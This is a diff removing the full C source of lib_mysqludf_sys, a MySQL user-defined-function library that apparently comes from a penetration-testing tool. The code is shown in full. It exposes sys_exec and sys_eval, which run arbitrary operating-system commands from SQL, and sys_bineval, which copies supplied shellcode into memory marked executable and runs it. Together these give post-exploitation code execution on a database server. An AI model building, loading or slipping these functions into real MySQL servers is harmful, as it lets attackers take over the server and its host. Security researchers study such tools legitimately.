extra/udfhack/windows/32/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.c

@@ -1,567 +0,0 @@
-/* 
-	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2007  Roland Bouman 
-	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
-	web: http://www.mysqludf.org/
-	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define DLLEXP __declspec(dllexport) 
-#else
-#define DLLEXP
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#ifdef STANDARD
-#include <string.h>
-#include <stdlib.h>
-#include <time.h>
-#ifdef __WIN__
-typedef unsigned __int64 ulonglong;
-typedef __int64 longlong;
-#else
-typedef unsigned long long ulonglong;
-typedef long long longlong;
-#endif /*__WIN__*/
-#else
-#include <my_global.h>
-#include <my_sys.h>
-#endif
-#include <mysql.h>
-#include <m_ctype.h>
-#include <m_string.h>
-#include <stdlib.h>
-
-#include <ctype.h>
-
-#ifdef HAVE_DLOPEN
-#ifdef	__cplusplus
-extern "C" {
-#endif
-
-#define LIBVERSION "lib_mysqludf_sys version 0.0.4"
-
-#ifdef __WIN__
-#define SETENV(name,value)		SetEnvironmentVariable(name,value);
-#else
-#define SETENV(name,value)		setenv(name,value,1);		
-#endif
-
-DLLEXP 
-my_bool lib_mysqludf_sys_info_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void lib_mysqludf_sys_info_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* lib_mysqludf_sys_info(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_get
- * 
- * Gets the value of the specified environment variable.
- */
-DLLEXP 
-my_bool sys_get_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_get_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* sys_get(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_set
- * 
- * Sets the value of the environment variables.
- * This function accepts a set of name/value pairs
- * which are then set as environment variables.
- * Use sys_get to retrieve the value of such a variable 
- */
-DLLEXP 
-my_bool sys_set_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_set_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-long long sys_set(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_exec
- * 
- * executes the argument commandstring and returns its exit status.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_exec_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_exec_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-my_ulonglong sys_exec(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_eval
- * 
- * executes the argument commandstring and returns its standard output.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_eval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_eval_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* sys_eval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_bineval
- * 
- * executes bynary opcodes.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_bineval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-);
-
-DLLEXP 
-void sys_bineval_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-int sys_bineval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-);
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-
-#ifdef	__cplusplus
-}
-#endif
-
-/**
- * lib_mysqludf_sys_info
- */
-my_bool lib_mysqludf_sys_info_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	my_bool status;
-	if(args->arg_count!=0){
-		strcpy(
-			message
-		,	"No arguments allowed (udf: lib_mysqludf_sys_info)"
-		);
-		status = 1;
-	} else {
-		status = 0;
-	}
-	return status;
-}
-
-void lib_mysqludf_sys_info_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* lib_mysqludf_sys_info(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	strcpy(result,LIBVERSION);
-	*length = strlen(LIBVERSION);
-	return result;
-}
-
-my_bool sys_get_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	if(args->arg_count==1
-	&&	args->arg_type[0]==STRING_RESULT){
-		initid->maybe_null = 1;
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_get_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* sys_get(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	char* value = getenv(args->args[0]);
-	if(value == NULL){
-		*is_null = 1;
-	} else {
-		*length = strlen(value);
-	} 
-	return value;
-}
-
-my_bool sys_set_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	if(args->arg_count!=2){
-		strcpy(
-			message
-		,	"Expected exactly two arguments"
-		);		
-		return 1;
-	}
-	if(args->arg_type[0]!=STRING_RESULT){
-		strcpy(
-			message
-		,	"Expected string type for name parameter"
-		);		
-		return 1;
-	}
-	args->arg_type[1]=STRING_RESULT;
-	if((initid->ptr=malloc(
-		args->lengths[0]
-	+	1
-	+	args->lengths[1]
-	+	1
-	))==NULL){
-		strcpy(
-			message
-		,	"Could not allocate memory"
-		);		
-		return 1;
-	}	
-	return 0;
-}
-
-void sys_set_deinit(
-	UDF_INIT *initid
-){
-	if (initid->ptr!=NULL){
-		free(initid->ptr);
-	}
-}
-
-long long sys_set(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-){	
-	char *name = initid->ptr;
-	char *value = name + args->lengths[0] + 1; 
-	memcpy(
-		name
-	,	args->args[0]
-	,	args->lengths[0]
-	);
-	*(name + args->lengths[0]) = '\0';
-	memcpy(
-		value
-	,	args->args[1]
-	,	args->lengths[1]
-	);
-	*(value + args->lengths[1]) = '\0';
-	return SETENV(name,value);		
-}
-
-my_bool sys_exec_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	unsigned int i=0;
-	if(args->arg_count == 1
-	&& args->arg_type[i]==STRING_RESULT){
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_exec_deinit(
-	UDF_INIT *initid
-){
-}
-
-my_ulonglong sys_exec(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-){
-	return system(args->args[0]);
-}
-
-my_bool sys_eval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	unsigned int i=0;
-	if(args->arg_count == 1
-	&& args->arg_type[i]==STRING_RESULT){
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_eval_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* sys_eval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	FILE *pipe;
-	char *line;
-	unsigned long outlen, linelen;
-
-	line = (char *)malloc(1024);
-	result = (char *)malloc(1);
-	outlen = 0;
-
-    result[0] = (char)0;
-
-	pipe = popen(args->args[0], "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (!(*result) || result == NULL) {
-		*is_null = 1;
-	} else {
-		result[outlen-1] = 0x00;
-		*length = strlen(result);
-	}
-
-	return result;
-}
-
-my_bool sys_bineval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-){
-	return 0;
-}
-
-void sys_bineval_deinit(
-	UDF_INIT *initid
-){
-	
-}
-
-int sys_bineval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-){
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	len = (size_t)strlen(args->args[0]);
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, args->args[0], len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		return 1;
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			return 1;
-
-		strncpy((char *)addr, args->args[0], len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	return 0;
-}
-
-#if defined(_WIN64)
-void __exec_payload(LPVOID);
-
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__exec_payload(lpParameter);
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-	}
-
-	return 0;
-}
-#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-	}
-
-	return 0;
-}
-#endif
-
-#endif /* HAVE_DLOPEN */